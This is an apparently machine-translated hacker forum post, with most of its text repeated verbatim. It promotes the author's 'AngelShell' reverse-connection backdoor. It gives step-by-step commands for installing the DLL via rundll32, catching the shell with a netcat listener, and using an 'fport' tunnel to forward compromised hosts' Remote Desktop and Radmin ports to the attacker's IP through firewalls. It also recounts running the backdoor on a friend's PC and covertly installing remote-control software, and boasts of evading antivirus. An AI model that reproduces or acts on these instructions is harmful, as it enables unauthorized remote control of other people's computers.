Nowadays, almost all servers are placed behind the hardware firewall. After finally penetrating, I found that there is a hardware firewall installed, which is a disappointment! Don’t even think about terminal services, Radmin and other control methods. After trying it, I found that almost all of them support reverse connections. Forward connections can only connect ports 80 and 21, and even 1433 cannot be connected. Then send it to the reverse back door, and it will be Killed by the antivirus software. In a fit of anger, I moved out Delphi and wrote the back door by myself! After a few days, the back door was finally written and met the ideal requirements. The use effect was very good, which was enough to be called a hardware firewall and an intranet broiler’s nightmare! I dare not enjoy it alone, so I will take it out and share it with you.
This program is called AngelShell, and I use my broiler to test it here. First, you need to configure a file that records reverse connection information locally. The first line is your own IP and the second line is the port that is listened to with NC. After writing it, put it on the HTTP space, and then configure it: configure the password and the HTTP access address you just uploaded to the FTP space.
You can choose the server that generates the DLL or the server that EXE, where the server that EXE can be installed directly, while the server that DLL needs to be installed with the following command: "rundll32 dll path, I", remember that the last I must be capitalized.
Tip: The program author actually provides the EXE server for convenience. Its essence is to install DLL programs, but it is just to use the program to unpack and automatically install it.
Here I will use the DLL server to demonstrate. First pass the DLL to your beloved broiler, and then type in: "rundll32 ,I" on the command line. Note that I connected to broiler via FTP, so I directly installed it using the FTP command line for convenience.
After installing it, listen to port 7787 on your machine with: "nc –v –l –p 7787", which is the port in the configuration file I first wrote. After a while, the NC prompted that there was information transmission. Enter the password and type in Enter. OK. The connection was successful. After the help information was displayed, the cute shell came out.
Tip: This backdoor also provides some additional commands that can be executed directly in the shell. In order to avoid conflicts with existing program names, all additional commands are in lowercase.
Having said that, you may think that this backdoor is nothing special except that it can generate an EXE server. Of course, these functions are not enough to create my characteristics, nor can they be regarded as a nightmare for hardware firewalls. The backdoor we used this time not only to enable it to achieve reverse connection itself, but also to enable all other programs that can connect forward in reverse connection, such as terminal services, Radmin, MSSQL, etc.! Haha, don’t be surprised, the good show is coming, I won’t disappoint everyone, Let’s GO!
Do you see the additional command for Fport in the shell? That is, port forwarding, which can reversely simulate any port of a remote computer to the local area. What? You don't understand? Haha, it doesn’t matter, just look down and you will know. Let's test Windows' terminal services first. I have opened a terminal service for this broiler before, but I have been suffering from the interception of the hardware firewall and cannot connect. Today I have to have a good time!
Tips: How to use Fport:
fport
The parameter local port refers to the port you want to forward on the broiler, Your IP is your IP (or domain name, YourPort refers to the port you listen on your client.
Open the client, fill in 3389 on the "Port to be simulated", and fill in arbitrarily on the "Port to connect to the remote computer". Of course, do not conflict with the opened port. Here I fill in 7788, and then click "Start Listening". Hurry up and hit the broiler's shell: "fport 3389 61.187.***.*** 7788". Among them, 3389 is the port of the broiler's terminal service, and 7788 is the port of our side to connect to the remote computer. Then the client immediately prompts that the connection to the remote computer has been received, prompting that the local port 3389 can be connected to it. In this way, we moved the 3389 port on the broiler to our love machine.
Friends, what are we waiting for? Open the terminal service login, fill in the local 127.0.0.1 on the IP, and the client immediately shows that a new connection has been successfully established, and a remote desktop login dialog box appears. I was so excited that I couldn't express it in language!
Let's try logging in to two users, and the client shows that a new connection has been successfully established. As it turns out, logging in to 2 users at the same time was also successful! Of course, if you want, you can log in to more users. Each connection I set up when programming is used to transmit data through 2 threads, so the transmission speed is guaranteed.
Just as I was immersed in joy, the phone rang. It turned out that an MM bought a camera and asked me to help her pretend. Do I have to go there too? So I asked her to go to QQ and just give me another test. Although this MM does not have a hardware-level firewall, she uses Windows XP Professional Edition on the intranet. I first pass the EXE server to her, ask her to run it, and then listen locally. After a while, I will prompt that I received the message and need to enter a password. After entering the password, I got a shell, and then used the file download function to install a Radmin for her. It's sinister! Then type in the following command: "fport 4899 61.187.***.*** 7788", forward her port 4899 to my port 4899, then open Radmin Viewer locally, connect to the IP and write 127.0.0.1, and the port will be connected using the default 4899 and successfully connected! .
I helped her open the device manager and installed the camera driver in a few seconds. The MM was still stunned and didn’t know what was going on. Haha, I admire her when she reacted! I had to clamor to take my teacher, and I'm sweating... the test is over here, so don't mention the joy in my heart, haha!
This program theoretically supports any protocol, but due to the particularity of some protocols, it will verify the IP, so it may not achieve the effect we want. For example, WEB service, today I turned the 80 port on the broiler, and wanted to trick others into saying that I opened a website. As a result, it showed up one after another: "No web...in this ...", which roughly means that there is no WEB service at this address, and then I remembered that there is a Host value in the HTTP protocol that does not match, no wonder.
Finally, let me talk about the method of using this program in the intranet. If you are on the intranet, you need a broiler that allows forward connection to be transferred. Transfer the port of the server you want to transfer to this transit broiler, and then directly connect to this transit broiler is equivalent to connecting to the server!
Okay, I hope this article can help you. Friends can see this, and I am already very grateful. Finally, I wish you all happiness forever and your skills will flourish!
This program is called AngelShell, and I use my broiler to test it here. First, you need to configure a file that records reverse connection information locally. The first line is your own IP and the second line is the port that is listened to with NC. After writing it, put it on the HTTP space, and then configure it: configure the password and the HTTP access address you just uploaded to the FTP space.
You can choose the server that generates the DLL or the server that EXE, where the server that EXE can be installed directly, while the server that DLL needs to be installed with the following command: "rundll32 dll path, I", remember that the last I must be capitalized.
Tip: The program author actually provides the EXE server for convenience. Its essence is to install DLL programs, but it is just to use the program to unpack and automatically install it.
Here I will use the DLL server to demonstrate. First pass the DLL to your beloved broiler, and then type in: "rundll32 ,I" on the command line. Note that I connected to broiler via FTP, so I directly installed it using the FTP command line for convenience.
After installing it, listen to port 7787 on your machine with: "nc –v –l –p 7787", which is the port in the configuration file I first wrote. After a while, the NC prompted that there was information transmission. Enter the password and type in Enter. OK. The connection was successful. After the help information was displayed, the cute shell came out.
Tip: This backdoor also provides some additional commands that can be executed directly in the shell. In order to avoid conflicts with existing program names, all additional commands are in lowercase.
Having said that, you may think that this backdoor is nothing special except that it can generate an EXE server. Of course, these functions are not enough to create my characteristics, nor can they be regarded as a nightmare for hardware firewalls. The backdoor we used this time not only to enable it to achieve reverse connection itself, but also to enable all other programs that can connect forward in reverse connection, such as terminal services, Radmin, MSSQL, etc.! Haha, don’t be surprised, the good show is coming, I won’t disappoint everyone, Let’s GO!
Do you see the additional command for Fport in the shell? That is, port forwarding, which can reversely simulate any port of a remote computer to the local area. What? You don't understand? Haha, it doesn’t matter, just look down and you will know. Let's test Windows' terminal services first. I have opened a terminal service for this broiler before, but I have been suffering from the interception of the hardware firewall and cannot connect. Today I have to have a good time!
Tips: How to use Fport:
fport
The parameter local port refers to the port you want to forward on the broiler, Your IP is your IP (or domain name, YourPort refers to the port you listen on your client.
Open the client, fill in 3389 on the "Port to be simulated", and fill in arbitrarily on the "Port to connect to the remote computer". Of course, do not conflict with the opened port. Here I fill in 7788, and then click "Start Listening". Hurry up and hit the broiler's shell: "fport 3389 61.187.***.*** 7788". Among them, 3389 is the port of the broiler's terminal service, and 7788 is the port of our side to connect to the remote computer. Then the client immediately prompts that the connection to the remote computer has been received, prompting that the local port 3389 can be connected to it. In this way, we moved the 3389 port on the broiler to our love machine.
Friends, what are we waiting for? Open the terminal service login, fill in the local 127.0.0.1 on the IP, and the client immediately shows that a new connection has been successfully established, and a remote desktop login dialog box appears. I was so excited that I couldn't express it in language!
Let's try logging in to two users, and the client shows that a new connection has been successfully established. As it turns out, logging in to 2 users at the same time was also successful! Of course, if you want, you can log in to more users. Each connection I set up when programming is used to transmit data through 2 threads, so the transmission speed is guaranteed.
Just as I was immersed in joy, the phone rang. It turned out that an MM bought a camera and asked me to help her pretend. Do I have to go there too? So I asked her to go to QQ and just give me another test. Although this MM does not have a hardware-level firewall, she uses Windows XP Professional Edition on the intranet. I first pass the EXE server to her, ask her to run it, and then listen locally. After a while, I will prompt that I received the message and need to enter a password. After entering the password, I got a shell, and then used the file download function to install a Radmin for her. It's sinister! Then type in the following command: "fport 4899 61.187.***.*** 7788", forward her port 4899 to my port 4899, then open Radmin Viewer locally, connect to the IP and write 127.0.0.1, and the port will be connected using the default 4899 and successfully connected! .
I helped her open the device manager and installed the camera driver in a few seconds. The MM was still stunned and didn’t know what was going on. Haha, I admire her when she reacted! I had to clamor to take my teacher, and I'm sweating... the test is over here, so don't mention the joy in my heart, haha!
This program theoretically supports any protocol, but due to the particularity of some protocols, it will verify the IP, so it may not achieve the effect we want. For example, WEB service, today I turned the 80 port on the broiler, and wanted to trick others into saying that I opened a website. As a result, it showed up one after another: "No web...in this ...", which roughly means that there is no WEB service at this address, and then I remembered that there is a Host value in the HTTP protocol that does not match, no wonder.
Finally, let me talk about the method of using this program in the intranet. If you are on the intranet, you need a broiler that allows forward connection to be transferred. Transfer the port of the server you want to transfer to this transit broiler, and then directly connect to this transit broiler is equivalent to connecting to the server!
Okay, I hope this article can help you. Friends can see this, and I am already very grateful. Finally, I wish you all happiness forever and your skills will flourish!